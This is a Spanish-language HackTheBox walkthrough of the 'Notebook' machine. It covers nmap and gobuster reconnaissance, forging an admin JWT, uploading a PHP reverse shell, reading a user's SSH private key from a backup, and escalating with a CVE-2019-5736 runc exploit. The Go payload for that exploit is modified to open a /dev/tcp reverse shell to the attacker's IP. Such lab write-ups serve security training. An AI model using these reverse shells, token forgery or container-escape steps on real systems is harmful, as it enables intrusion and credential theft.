Notebook

Notebook

Jul 7, 2021
HTB Linux

nmap -A -p- -oA notebook 10.129.183.202 —min-rate=10000 —script=vuln —script-timeout=15 -v

ssh_command.

nmap -sC -sV -O -p- -oA notebook 10.129.183.202

nmap -sU -O -p- -oA notebook-udp 10.129.183.202

nikto -h 10.129.183.202:80

gobuster dir -k -u http://10.129.183.202/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Nos metemos a la pagina web http://10.129.183.202

ssh_command.

Le damos click en register y nos registramos

ssh_command.

Le damos click a Add new notes

ssh_command.

Con el inspector de dev tools vamos a Application-> Cookies y vemos el valor que esta en auth

ssh_command.

Creamos una llave con los siguientes comandos:

openssl genrsa -out privKey.key 2048

xclip -sel c < privKey.key

ssh_command.

Vamos a la pagina https://jwt.io/ y le damos click a debugger. Copiamos lo que habiamos encontrado en auth y lo ponemos en donded dice Encoded.

ssh_command.

Esta es la primera parte del Token.

ssh_command.

Vamos a https://jwt.io/ y cambiamos localhost a la ip de Kali

ssh_command.

Esta es la segunda parte del Token.

ssh_command.

Vamos a https://jwt.io/ y cambiamos 0 por 1 para admin_cap

ssh_command.

Copiamos todo lo que se encuentra en encoded

ssh_command.

Y lo metemos de nuevo en auth en Cookies

ssh_command.

Le damos click en upload

ssh_command.

locate php-reverse-shell.php

cp /usr/share/webshell/php/php-reverse-shell.php .

Cambiamos la ip y el puerto a la ip de kali y cualquier puerto en este vamos a usar 5555

ssh_command.

nc -lvnp 5555

Subimos el archivo

Le damos click a View

ssh_command.

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

ssh_command.

ssh_command.

mkdir -p /tmp/backups

cd /var/backups

tar -zxvf home.tar.gz -C /tmp/backups

ssh_command.

cat /tmp/backups/home/noah/.ssh/id_rsa

ssh_command.

Copiamos el resultado y creamos un archivo en kali llamado id_rsa

ssh_command.

sudo -l

Vemos que corriendo docker no se necesita una contrasena. Para esto siempre es bueno GTFObins

ssh_command.

https://www.exploit-db.com/exploits/46369

Buscamos en exploit.db si tienen un exploit para docker. Y vemos que tienen una para la version que tenemos.

CVE-2019-5736 poc en google

https://github.com/Frichetten/CVE-2019-5736-PoC

Bajamos y modificamos el archivo main.go

ssh_command.

Cambiamos el payload para que diga lo siguiente:

’#!/bin/bash \n bash -i >&/dev/tcp/10.10.xx.xx/1234 0>&1’

ssh_command.

ssh_command.

Guardamos estos cambios en el archivo llamado main.go

go build main.go

nc -lvnp 1234

python3 -m http.server 80

ssh_command.

sudo docker exec -it webapp-dev01 bash

wget http://10.10.xx.xx/main

.\main

sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh

nc -lvnp 1234

ssh_command.

ssh_command.